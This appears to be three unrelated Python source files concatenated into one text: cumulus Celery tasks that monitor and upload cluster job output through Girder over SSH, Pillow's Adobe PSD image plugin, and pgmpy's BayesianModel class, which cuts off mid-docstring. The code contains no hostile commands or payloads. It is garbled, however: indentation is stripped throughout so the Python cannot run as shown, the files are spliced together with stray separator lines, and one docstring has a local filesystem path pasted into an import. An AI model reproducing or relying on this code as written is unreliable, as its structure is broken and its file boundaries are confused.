def from_string(s, **kwargs):
state = state_classes[s](None, **kwargs)
return state
def _monitor_jobs(task, cluster, jobs, log_write_url=None, girder_token=None,
monitor_interval=5):
headers = {'Girder-Token': girder_token}
cluster_url = '%s/clusters/%s' % (
cumulus.config.girder.baseUrl, cluster['_id'])
try:
with get_connection(girder_token, cluster) as conn:
try:
job_queue_states \
= get_queue_adapter(cluster, conn).job_statuses(jobs)
new_states = set()
for (job, state) in job_queue_states:
job_id = job['_id']
# First get the current status
status_url = '%s/jobs/%s/status' % (
cumulus.config.girder.baseUrl, job_id)
r = requests.get(status_url, headers=headers)
check_status(r)
current_status = r.json()['status']
if current_status == JobState.TERMINATED:
continue
job_status = from_string(current_status, task=task,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = job_status.next(state)
job['status'] = str(job_status)
job_status.run()
json = {
'status': str(job_status),
'timings': job.get('timings', {}),
'output': job['output']
}
job_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl,
job['_id'])
r = requests.patch(job_url, headers=headers, json=json)
check_status(r)
new_states.add(job['status'])
# Now see if we still have jobs to monitor
running_states = set(
[JobState.CREATED, JobState.QUEUED,
JobState.RUNNING, JobState.TERMINATING]
)
# Do we have any job still in a running state?
if new_states & running_states:
task.retry(countdown=monitor_interval)
except EOFError:
# Try again
task.retry(countdown=5)
return
except paramiko.ssh_exception.NoValidConnectionsError:
# Try again
task.retry(countdown=5)
return
# Ensure that the Retry exception will get through
except Retry:
raise
except paramiko.ssh_exception.NoValidConnectionsError as ex:
r = requests.patch(cluster_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_cluster_logger(cluster, girder_token).exception(str(ex))
except Exception as ex:
traceback.print_exc()
r = requests.patch(cluster_url, headers=headers,
json={'status': 'error'})
check_status(r)
get_cluster_logger(cluster, girder_token).exception(str(ex))
raise
@monitor.task(bind=True, max_retries=None, throws=(Retry,))
def monitor_job(task, cluster, job, log_write_url=None, girder_token=None,
monitor_interval=5):
_monitor_jobs(task, cluster, [job], log_write_url, girder_token,
monitor_interval=monitor_interval)
@monitor.task(bind=True, max_retries=None, throws=(Retry,))
def monitor_jobs(task, cluster, jobs, log_write_url=None, girder_token=None,
monitor_interval=5):
_monitor_jobs(task, cluster, jobs, log_write_url, girder_token,
monitor_interval=monitor_interval)
def upload_job_output_to_item(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
with get_connection(girder_token, cluster) as conn:
# First put girder client on master
path = inspect.getsourcefile(cumulus.girderclient)
with open(path, 'r') as fp:
conn.put(fp,
os.path.normpath(os.path.join(job_dir, '..',
os.path.basename(path))))
cmds = ['cd %s' % job_dir]
upload_cmd = 'python ../girderclient.py --token %s --url "%s" ' \
'upload --job %s' \
% (girder_token,
cumulus.config.girder.baseUrl, job['_id'])
upload_output = '%s.upload.out' % job_id
upload_output_path = os.path.normpath(os.path.join(job_dir, '..',
upload_output))
cmds.append('nohup %s &> ../%s &\n' % (upload_cmd, upload_output))
upload_cmd = _put_script(conn, '\n'.join(cmds))
output = conn.execute(upload_cmd)
# Remove upload script
conn.remove(upload_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s' % output)
on_complete = None
if _get_on_complete(job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, cluster['_id'])
on_complete = signature(
'cumulus.tasks.cluster.terminate_cluster',
args=(cluster,), kwargs={'log_write_url': cluster_log_url,
'girder_token': girder_token})
monitor_process.delay(cluster, job, pid, upload_output_path,
log_write_url=log_write_url,
on_complete=on_complete,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
def upload_job_output_to_folder(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job['_id'])
headers = {'Girder-Token': girder_token}
assetstore_base_url = get_assetstore_url_base(cluster)
assetstore_id = get_assetstore_id(girder_token, cluster)
if not job_dir:
job_dir = job['dir']
try:
with get_connection(girder_token, cluster) as conn:
for output in job['output']:
if 'folderId' in output and 'path' in output:
folder_id = output['folderId']
path = os.path.join(job_dir, output['path'])
download_path(conn, girder_token, folder_id, path,
assetstore_base_url, assetstore_id,
include=output.get('include'),
exclude=output.get('exclude'))
except HttpError as e:
job['status'] = JobState.ERROR
url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
logger = get_post_logger('job', girder_token, url)
logger.exception(e.responseText)
r = requests.patch(status_url, headers=headers,
json={'status': JobState.ERROR})
check_status(r)
if _get_on_complete(job) == 'terminate':
cluster_log_url = '%s/clusters/%s/log' % \
(cumulus.config.girder.baseUrl, cluster['_id'])
command.send_task(
'cumulus.tasks.cluster.terminate_cluster',
args=(cluster,), kwargs={'log_write_url': cluster_log_url,
'girder_token': girder_token})
# If we where uploading move job to the complete state
if job['status'] == JobState.UPLOADING:
job_status = from_string(job['status'], task=None,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = Complete(job_status)
job_status = job_status.next(JobQueueState.COMPLETE)
job_status.run()
r = requests.patch(status_url, headers=headers,
json={'status': str(job_status)})
check_status(r)
@command.task
def upload_job_output(cluster, job, log_write_url=None, job_dir=None,
girder_token=None):
job_name = job['name']
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
log.info('Uploading output for "%s"' % job_name)
if parse('output.itemId').find(job):
upload_job_output_to_item(cluster, job, log_write_url=log_write_url,
job_dir=job_dir, girder_token=girder_token)
else:
upload_job_output_to_folder(cluster, job, log_write_url=log_write_url,
job_dir=job_dir, girder_token=girder_token)
@monitor.task(bind=True, max_retries=None)
def monitor_process(task, cluster, job, pid, nohup_out_path,
log_write_url=None, on_complete=None,
output_message='Job download/upload error: %s',
girder_token=None):
job_url = '%s/jobs/%s/log' % (cumulus.config.girder.baseUrl, job['_id'])
log = get_post_logger(job['_id'], girder_token, job_url)
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
# if terminating break out
if _is_terminating(job, girder_token):
return
with get_connection(girder_token, cluster) as conn:
# See if the process is still running
output = conn.execute('ps %s | grep %s' % (pid, pid),
ignore_exit_status=True,
source_profile=False)
if len(output) > 0:
# Process is still running so schedule self again in about 5
# secs
# N.B. throw=False to prevent Retry exception being raised
task.retry(throw=False, countdown=5)
else:
try:
nohup_out_file_name = os.path.basename(nohup_out_path)
# Log the output
with conn.get(nohup_out_path) as fp:
output = fp.read()
if output.strip():
log.error(output_message % output)
# If we have output then set the error state on the
# job and return
r = requests.patch(status_url, headers=headers,
json={'status': JobState.ERROR})
check_status(r)
return
finally:
if nohup_out_file_name and \
os.path.exists(nohup_out_file_name):
os.remove(nohup_out_file_name)
# Fire off the on_compete task if we have one
if on_complete:
signature(on_complete).delay()
# If we where uploading move job to the complete state
if job['status'] == JobState.UPLOADING:
job_status = from_string(job['status'], task=task,
cluster=cluster, job=job,
log_write_url=log_write_url,
girder_token=girder_token,
conn=conn)
job_status = Complete(job_status)
job_status = job_status.next(JobQueueState.COMPLETE)
job_status.run()
r = requests.patch(status_url, headers=headers,
json={'status': str(job_status)})
check_status(r)
except EOFError:
# Try again
task.retry(throw=False, countdown=5)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
@command.task
def terminate_job(cluster, job, log_write_url=None, girder_token=None):
script_filepath = None
headers = {'Girder-Token': girder_token}
job_id = job['_id']
status_url = '%s/jobs/%s' % (cumulus.config.girder.baseUrl, job_id)
try:
with get_connection(girder_token, cluster) as conn:
if AbstractQueueAdapter.QUEUE_JOB_ID in job:
queue_adapter = get_queue_adapter(cluster, conn)
output = queue_adapter.terminate_job(job)
else:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.TERMINATED})
check_status(r)
if 'onTerminate' in job:
commands = '\n'.join(job['onTerminate']['commands']) + '\n'
commands = Template(commands) \
.render(cluster=cluster,
job=job,
base_url=cumulus.config.girder.baseUrl)
on_terminate = _put_script(conn, commands + '\n')
terminate_output = '%s.terminate.out' % job_id
terminate_cmd = 'nohup %s &> %s &\n' % (on_terminate,
terminate_output)
terminate_cmd = _put_script(conn, terminate_cmd)
output = conn.execute(terminate_cmd)
conn.remove(on_terminate)
conn.remove(terminate_cmd)
if len(output) != 1:
raise Exception('PID not returned by execute command')
try:
pid = int(output[0])
except ValueError:
raise Exception('Unable to extract PID from: %s'
% output)
output_message = 'onTerminate error: %s'
monitor_process.delay(cluster, job, pid, terminate_output,
log_write_url=log_write_url,
output_message=output_message,
girder_token=girder_token)
except Exception as ex:
r = requests.patch(status_url, headers=headers,
json={'status': JobState.UNEXPECTEDERROR})
check_status(r)
get_job_logger(job, girder_token).exception(str(ex))
raise
finally:
if script_filepath and os.path.exists(script_filepath):
os.remove(script_filepath)
@command.task(bind=True, max_retries=5)
def remove_output(task, cluster, job, girder_token):
try:
with get_connection(girder_token, cluster) as conn:
rm_cmd = 'rm -rf %s' % job['dir']
conn.execute(rm_cmd)
except EOFError:
# Try again
task.retry(countdown=5)
|
|
#
# The Python Imaging Library
# $Id$
#
# Adobe PSD 2.5/3.0 file handling
#
# History:
# 1995-09-01 fl Created
# 1997-01-03 fl Read most PSD images
# 1997-01-18 fl Fixed P and CMYK support
# 2001-10-21 fl Added seek/tell support (for layers)
#
# Copyright (c) 1997-2001 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import io
from . import Image, ImageFile, ImagePalette
from ._binary import i8, i16be as i16, i32be as i32
MODES = {
# (photoshop mode, bits) -> (pil mode, required channels)
(0, 1): ("1", 1),
(0, 8): ("L", 1),
(1, 8): ("L", 1),
(2, 8): ("P", 1),
(3, 8): ("RGB", 3),
(4, 8): ("CMYK", 4),
(7, 8): ("L", 1), # FIXME: multilayer
(8, 8): ("L", 1), # duotone
(9, 8): ("LAB", 3),
}
# --------------------------------------------------------------------.
# read PSD images
def _accept(prefix):
return prefix[:4] == b"8BPS"
##
# Image plugin for Photoshop images.
class PsdImageFile(ImageFile.ImageFile):
format = "PSD"
format_description = "Adobe Photoshop"
_close_exclusive_fp_after_loading = False
def _open(self):
read = self.fp.read
#
# header
s = read(26)
if not _accept(s) or i16(s[4:]) != 1:
raise SyntaxError("not a PSD file")
psd_bits = i16(s[22:])
psd_channels = i16(s[12:])
psd_mode = i16(s[24:])
mode, channels = MODES[(psd_mode, psd_bits)]
if channels > psd_channels:
raise OSError("not enough channels")
self.mode = mode
self._size = i32(s[18:]), i32(s[14:])
#
# color mode data
size = i32(read(4))
if size:
data = read(size)
if mode == "P" and size == 768:
self.palette = ImagePalette.raw("RGB;L", data)
#
# image resources
self.resources = []
size = i32(read(4))
if size:
# load resources
end = self.fp.tell() + size
while self.fp.tell() < end:
read(4) # signature
id = i16(read(2))
name = read(i8(read(1)))
if not (len(name) & 1):
read(1) # padding
data = read(i32(read(4)))
if len(data) & 1:
read(1) # padding
self.resources.append((id, name, data))
if id == 1039: # ICC profile
self.info["icc_profile"] = data
#
# layer and mask information
self.layers = []
size = i32(read(4))
if size:
end = self.fp.tell() + size
size = i32(read(4))
if size:
self.layers = _layerinfo(self.fp)
self.fp.seek(end)
self.n_frames = len(self.layers)
self.is_animated = self.n_frames > 1
#
# image descriptor
self.tile = _maketile(self.fp, mode, (0, 0) + self.size, channels)
# keep the file open
self.__fp = self.fp
self.frame = 1
self._min_frame = 1
def seek(self, layer):
if not self._seek_check(layer):
return
# seek to given layer (1..max)
try:
name, mode, bbox, tile = self.layers[layer - 1]
self.mode = mode
self.tile = tile
self.frame = layer
self.fp = self.__fp
return name, bbox
except IndexError as e:
raise EOFError("no such layer") from e
def tell(self):
# return layer number (0=image, 1..max=layers)
return self.frame
def load_prepare(self):
# create image memory if necessary
if not self.im or self.im.mode != self.mode or self.im.size != self.size:
self.im = Image.core.fill(self.mode, self.size, 0)
# create palette (optional)
if self.mode == "P":
Image.Image.load(self)
def _close__fp(self):
try:
if self.__fp != self.fp:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
def _layerinfo(file):
# read layerinfo block
layers = []
read = file.read
for i in range(abs(i16(read(2)))):
# bounding box
y0 = i32(read(4))
x0 = i32(read(4))
y1 = i32(read(4))
x1 = i32(read(4))
# image info
info = []
mode = []
types = list(range(i16(read(2))))
if len(types) > 4:
continue
for i in types:
type = i16(read(2))
if type == 65535:
m = "A"
else:
m = "RGBA"[type]
mode.append(m)
size = i32(read(4))
info.append((m, size))
# figure out the image mode
mode.sort()
if mode == ["R"]:
mode = "L"
elif mode == ["B", "G", "R"]:
mode = "RGB"
elif mode == ["A", "B", "G", "R"]:
mode = "RGBA"
else:
mode = None # unknown
# skip over blend flags and extra information
read(12) # filler
name = ""
size = i32(read(4)) # length of the extra data field
combined = 0
if size:
data_end = file.tell() + size
length = i32(read(4))
if length:
file.seek(length - 16, io.SEEK_CUR)
combined += length + 4
length = i32(read(4))
if length:
file.seek(length, io.SEEK_CUR)
combined += length + 4
length = i8(read(1))
if length:
# Don't know the proper encoding,
# Latin-1 should be a good guess
name = read(length).decode("latin-1", "replace")
combined += length + 1
file.seek(data_end)
layers.append((name, mode, (x0, y0, x1, y1)))
# get tiles
i = 0
for name, mode, bbox in layers:
tile = []
for m in mode:
t = _maketile(file, m, bbox, 1)
if t:
tile.extend(t)
layers[i] = name, mode, bbox, tile
i += 1
return layers
def _maketile(file, mode, bbox, channels):
tile = None
read = file.read
compression = i16(read(2))
xsize = bbox[2] - bbox[0]
ysize = bbox[3] - bbox[1]
offset = file.tell()
if compression == 0:
#
# raw compression
tile = []
for channel in range(channels):
layer = mode[channel]
if mode == "CMYK":
layer += ";I"
tile.append(("raw", bbox, offset, layer))
offset = offset + xsize * ysize
elif compression == 1:
#
# packbits compression
i = 0
tile = []
bytecount = read(channels * ysize * 2)
offset = file.tell()
for channel in range(channels):
layer = mode[channel]
if mode == "CMYK":
layer += ";I"
tile.append(("packbits", bbox, offset, layer))
for y in range(ysize):
offset = offset + i16(bytecount[i : i + 2])
i += 2
file.seek(offset)
if offset & 1:
read(1) # padding
return tile
# --------------------------------------------------------------------
# registry
Image.register_open(PsdImageFile.format, PsdImageFile, _accept)
Image.register_extension(PsdImageFile.format, ".psd")
|
|
#!/usr/bin/env python3
import itertools
from collections import defaultdict
import logging
import networkx as nx
import numpy as np
import pandas as pd
from pgmpy.base import DirectedGraph
from pgmpy.factors import TabularCPD
from pgmpy.independencies import Independencies
from pgmpy.extern.six.moves import range
class BayesianModel(DirectedGraph):
"""
Base class for bayesian model.
A models stores nodes and edges with conditional probability
distribution (cpd) and other attributes.
models hold directed edges. Self loops are not allowed neither
multiple (parallel) edges.
Nodes should be strings.
Edges are represented as links between nodes.
Parameters
----------
data : input graph
Data to initialize graph. If data=None (default) an empty
graph is created. The data can be an edge list, or any
NetworkX graph object.
Examples
--------
Create an empty bayesian model with no nodes and no edges.
>>> from pgmpy.models import BayesianModel
>>> G = BayesianModel()
G can be grown in several ways.
**Nodes:**
Add one node at a time:
>>> G.add_node('a')
Add the nodes from any container (a list, set or tuple or the nodes
from another graph).
>>> G.add_nodes_from(['a', 'b'])
**Edges:**
G can also be grown by adding edges.
Add one edge,
>>> G.add_edge('a', 'b')
a list of edges,
>>> G.add_edges_from([('a', 'b'), ('b', 'c')])
If some edges connect nodes not yet in the model, the nodes
are added automatically. There are no errors when adding
nodes or edges that already exist.
**Shortcuts:**
Many common graph features allow python syntax for speed reporting.
>>> 'a' in G # check if node in graph
True
>>> len(G) # number of nodes in graph
3
"""
def __init__(self, ebunch=None):
super(BayesianModel, self).__init__()
if ebunch:
self.add_edges_from(ebunch)
self.cpds = []
self.cardinalities = defaultdict(int)
def add_edge(self, u, v, **kwargs):
"""
Add an edge between u and v.
The nodes u and v will be automatically added if they are
not already in the graph
Parameters
----------
u,v : nodes
Nodes can be any hashable python object.
EXAMPLE
-------
>>> from pgmpy.models import BayesianModel/home/abinash/software_packages/numpy-1.7.1
>>> G = BayesianModel()
>>> G.add_nodes_from(['grade', 'intel'])
>>> G.add_edge('grade', 'intel')
"""
if u == v:
raise ValueError('Self loops are not allowed.')
if u in self.nodes() and v in self.nodes() and nx.has_path(self, v, u):
raise ValueError(
'Loops are not allowed. Adding the edge from (%s->%s) forms a loop.' % (u, v))
else:
super(BayesianModel, self).add_edge(u, v, **kwargs)
def add_cpds(self, *cpds):
"""
Add CPD (Conditional Probability Distribution) to the Bayesian Model.
Parameters
----------
cpds : list, set, tuple (array-like)
List of CPDs which will be associated with the model
EXAMPLE
-------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors.CPD import TabularCPD
>>> student = BayesianModel([('diff', 'grades'), ('intel', 'grades')])
>>> grades_cpd = TabularCPD('grades', 3, [[0.1,0.1,0.1,0.1,0.1,0.1],
... [0.1,0.1,0.1,0.1,0.1,0.1],
... [0.8,0.8,0.8,0.8,0.8,0.8]],
... evidence=['diff', 'intel'], evidence_card=[2, 3])
>>> student.add_cpds(grades_cpd)
+------+-----------------------+---------------------+
|diff: | easy | hard |
+------+------+------+---------+------+------+-------+
|intel:| dumb | avg | smart | dumb | avg | smart |
+------+------+------+---------+------+------+-------+
|gradeA| 0.1 | 0.1 | 0.1 | 0.1 | 0.1 | 0.1 |
+------+------+------+---------+------+------+-------+
|gradeB| 0.1 | 0.1 | 0.1 | 0.1 | 0.1 | 0.1 |
+------+------+------+---------+------+------+-------+
|gradeC| 0.8 | 0.8 | 0.8 | 0.8 | 0.8 | 0.8 |
+------+------+------+---------+------+------+-------+
"""
for cpd in cpds:
if not isinstance(cpd, TabularCPD):
raise ValueError('Only TabularCPD can be added.')
if set(cpd.variables) - set(cpd.variables).intersection(
set(self.nodes())):
raise ValueError('CPD defined on variable not in the model', cpd)
for prev_cpd_index in range(len(self.cpds)):
if self.cpds[prev_cpd_index].variable == cpd.variable:
logging.warning("Replacing existing CPD for {var}".format(var=cpd.variable))
self.cpds[prev_cpd_index] = cpd
break
else:
self.cpds.append(cpd)
def get_cpds(self, node=None):
"""
Returns the cpds that have been added till now to the graph
Parameter
---------
node: any hashable python object (optional)
The node whose CPD we want. If node not specified returns all the
CPDs added to the model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> student = BayesianModel([('diff', 'grade'), ('intel', 'grade')])
>>> cpd = TabularCPD('grade', 2, [[0.1, 0.9, 0.2, 0.7],
... [0.9, 0.1, 0.8, 0.3]],
... ['intel', 'diff'], [2, 2])
>>> student.add_cpds(cpd)
>>> student.get_cpds()
"""
if node:
if node not in self.nodes():
raise ValueError('Node not present in the Directed Graph')
for cpd in self.cpds:
if cpd.variable == node:
return cpd
else:
return self.cpds
def remove_cpds(self, *cpds):
"""
Removes the cpds that are provided in the argument.
Parameters
----------
*cpds: TabularCPD, TreeCPD, RuleCPD object
A CPD object on any subset of the variables of the model which
is to be associated with the model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> student = BayesianModel([('diff', 'grade'), ('intel', 'grade')])
>>> cpd = TabularCPD('grade', 2, [[0.1, 0.9, 0.2, 0.7],
... [0.9, 0.1, 0.8, 0.3]],
... ['intel', 'diff'], [2, 2])
>>> student.add_cpds(cpd)
>>> student.remove_cpds(cpd)
"""
for cpd in cpds:
if isinstance(cpd, str):
cpd = self.get_cpds(cpd)
self.cpds.remove(cpd)
def check_model(self):
"""
Check the model for various errors. This method checks for the following
errors.
* Checks if the sum of the probabilities for each state is equal to 1 (tol=0.01).
* Checks if the CPDs associated with nodes are consistent with their parents.
Returns
-------
check: boolean
True if all the checks are passed
"""
for node in self.nodes():
cpd = self.get_cpds(node=node)
if isinstance(cpd, TabularCPD):
evidence = cpd.evidence
parents = self.get_parents(node)
if set(evidence if evidence else []) != set(parents if parents else []):
raise ValueError("CPD associated with %s doesn't have "
"proper parents associated with it." % node)
if not np.allclose(cpd.to_factor().marginalize([node], inplace=False).values.flatten('C'),
np.ones(np.product(cpd.evidence_card)),
atol=0.01):
raise ValueError('Sum of probabilites of states for node %s'
' is not equal to 1.' % node)
return True
def _get_ancestors_of(self, obs_nodes_list):
"""
Returns a list of all ancestors of all the observed nodes.
Parameters
----------
obs_nodes_list: string, list-type
name of all the observed nodes
"""
if not isinstance(obs_nodes_list, (list, tuple)):
obs_nodes_list = [obs_nodes_list]
ancestors_list = set()
nodes_list = set(obs_nodes_list)
while nodes_list:
node = nodes_list.pop()
if node not in ancestors_list:
nodes_list.update(self.predecessors(node))
ancestors_list.add(node)
return ancestors_list
def active_trail_nodes(self, start, observed=None):
"""
Returns all the nodes reachable from start via an active trail.
Parameters
----------
start: Graph node
observed : List of nodes (optional)
If given the active trail would be computed assuming these nodes to be observed.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades')])
>>> student.active_trail_nodes('diff')
{'diff', 'grade'}
>>> student.active_trail_nodes('diff', observed='grades')
{'diff', 'intel'}
References
----------
Details of the algorithm can be found in 'Probabilistic Graphical Model
Principles and Techniques' - Koller and Friedman
Page 75 Algorithm 3.1
"""
if observed:
observed_list = [observed] if isinstance(observed, str) else observed
else:
observed_list = []
ancestors_list = self._get_ancestors_of(observed_list)
# Direction of flow of information
# up -> from parent to child
# down -> from child to parent
visit_list = set()
visit_list.add((start, 'up'))
traversed_list = set()
active_nodes = set()
while visit_list:
node, direction = visit_list.pop()
if (node, direction) not in traversed_list:
if node not in observed_list:
active_nodes.add(node)
traversed_list.add((node, direction))
if direction == 'up' and node not in observed_list:
for parent in self.predecessors(node):
visit_list.add((parent, 'up'))
for child in self.successors(node):
visit_list.add((child, 'down'))
elif direction == 'down':
if node not in observed_list:
for child in self.successors(node):
visit_list.add((child, 'down'))
if node in ancestors_list:
for parent in self.predecessors(node):
visit_list.add((parent, 'up'))
return active_nodes
def local_independencies(self, variables):
"""
Returns a independencies object containing the local independencies
of each of the variables.
Parameters
----------
variables: str or array like
variables whose local independencies are to found.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_edges_from([('diff', 'grade'), ('intel', 'grade'),
>>> ('grade', 'letter'), ('intel', 'SAT')])
>>> ind = student.local_independencies('grade')
>>> ind.event1
{'grade'}
>>> ind.event2
{'SAT'}
>>> ind.event3
{'diff', 'intel'}
"""
def dfs(node):
"""
Returns the descendents of node.
Since there can't be any cycles in the Bayesian Network. This is a
very simple dfs which doen't remember which nodes it has visited.
"""
descendents = []
visit = [node]
while visit:
n = visit.pop()
neighbors = self.neighbors(n)
visit.extend(neighbors)
descendents.extend(neighbors)
return descendents
from pgmpy.independencies import Independencies
independencies = Independencies()
for variable in [variables] if isinstance(variables, str) else variables:
independencies.add_assertions([variable, set(self.nodes()) - set(dfs(variable)) -
set(self.get_parents(variable)) - {variable},
set(self.get_parents(variable))])
return independencies
def is_active_trail(self, start, end, observed=None):
"""
Returns True if there is any active trail between start and end node
Parameters
----------
start : Graph Node
end : Graph Node
observed : List of nodes (optional)
If given the active trail would be computed assuming these nodes to be observed.
additional_observed : List of nodes (optional)
If given the active trail would be computed assuming these nodes to be observed along with
the nodes marked as observed in the model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades', 'letter', 'sat'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades'), ('grade', 'letter'),
... ('intel', 'sat')])
>>> student.is_active_trail('diff', 'intel')
False
>>> student.is_active_trail('grade', 'sat')
True
"""
if end in self.active_trail_nodes(start, observed):
return True
else:
return False
def get_independencies(self, latex=False):
"""
Compute independencies in Bayesian Network.
Parameters
----------
latex: boolean
If latex=True then latex string of the independence assertion
would be created.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> student = BayesianModel()
>>> student.add_nodes_from(['diff', 'intel', 'grades', 'letter', 'sat'])
>>> student.add_edges_from([('diff', 'grades'), ('intel', 'grades'), ('grade', 'letter'),
... ('intel', 'sat')])
>>> student.get_independencies()
"""
independencies = Independencies()
for start in (self.nodes()):
for r in (1, len(self.nodes())):
for observed in itertools.combinations(self.nodes(), r):
independent_variables = self.active_trail_nodes(start, observed=observed)
independent_variables = set(independent_variables) - {start}
if independent_variables:
independencies.add_assertions([start, independent_variables,
observed])
independencies.reduce()
if not latex:
return independencies
else:
return independencies.latex_string()
def to_markov_model(self):
"""
Converts bayesian model to markov model. The markov model created would
be the moral graph of the bayesian model.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> G = BayesianModel([('diff', 'grade'), ('intel', 'grade'),
... ('intel', 'SAT'), ('grade', 'letter')])
>>> mm = G.to_markov_model()
>>> mm.nodes()
['diff', 'grade', 'intel', 'SAT', 'letter']
>>> mm.edges()
[('diff', 'intel'), ('diff', 'grade'), ('intel', 'grade'),
('intel', 'SAT'), ('grade', 'letter')]
"""
from pgmpy.models import MarkovModel
moral_graph = self.moralize()
mm = MarkovModel(moral_graph.edges())
mm.add_factors(*[cpd.to_factor() for cpd in self.cpds])
return mm
def to_junction_tree(self):
"""
Creates a junction tree (or clique tree) for a given bayesian model.
For converting a Bayesian Model into a Clique tree, first it is converted
into a Markov one.
For a given markov model (H) a junction tree (G) is a graph
1. where each node in G corresponds to a maximal clique in H
2. each sepset in G separates the variables strictly on one side of the
edge to other.
Examples
--------
>>> from pgmpy.models import BayesianModel
>>> from pgmpy.factors import TabularCPD
>>> G = BayesianModel([('diff', 'grade'), ('intel', 'grade'),
... ('intel', 'SAT'), ('grade', 'letter')])
>>> diff_cpd = TabularCPD('diff', 2, [[0.2], [0.8]])
>>> intel_cpd = TabularCPD('intel', 3, [[0.5], [0.3], [0.2]])
>>> grade_cpd = TabularCPD('grade', 3,
... [[0.1,0.1,0.1,0.1,0.1,0.1],
... [0.1,0.1,0.1,0.1,0.1,0.1],
... [0.8,0.8,0.8,0.8,0.8,0.8]],
... evidence=['diff', 'intel'],
... evidence_card=[2, 3])
>>> sat_cpd = TabularCPD('SAT', 2,
... [[0.1, 0.2, 0.7],
... [0.9, 0.8, 0.3]],
... evidence=['intel'], evidence_card=[3])
>>> letter_cpd = TabularCPD('letter', 2,
... [[0.1, 0.4, 0.8],
... [0.9, 0.6, 0.2]],
... evidence=['grade'], evidence_card=[3])
>>> G.add_cpds(diff_cpd, intel_cpd, grade_cpd, sat_cpd, letter_cpd)
>>> jt = G.to_junction_tree()
"""
mm = self.to_markov_model()
return mm.to_junction_tree()
def fit(self, data, estimator_type=None):
"""
Computes the CPD for each node from a given data in the form of a pandas dataframe.
Parameters
----------
data : pandas DataFrame object
A DataFrame object with column names same as the variable names of network
estimator: Estimator class
Any pgmpy estimator. If nothing is specified, the default Maximum Likelihood
estimator would be used
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianModel
>>> values = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> model = BayesianModel([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> model.fit(values)
>>> model.get_cpds()
[<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e588>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173cb5e10>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e470>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e198>,
<pgmpy.factors.CPD.TabularCPD at 0x7fd173b2e2e8>]
"""
from pgmpy.estimators import MaximumLikelihoodEstimator, BaseEstimator
if estimator_type is None:
estimator_type = MaximumLikelihoodEstimator
else:
if not isinstance(estimator_type, BaseEstimator):
raise TypeError("Estimator object should be a valid pgmpy estimator.")
estimator = estimator_type(self, data)
cpds_list = estimator.get_parameters()
self.add_cpds(*cpds_list)
def predict(self, data):
"""
Predicts states of all the missing variables.
Parameters
----------
data : pandas DataFrame object
A DataFrame object with column names same as the variables in the model.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianModel
>>> values = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> train_data = values[:800]
>>> predict_data = values[800:]
>>> model = BayesianModel([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> model.fit(values)
>>> predict_data = predict_data.copy()
>>> predict_data.drop('E', axis=1, inplace=True)
>>> y_pred = model.predict(predict_data)
>>> y_pred
array([0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1,
1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1,
1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1,
1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1,
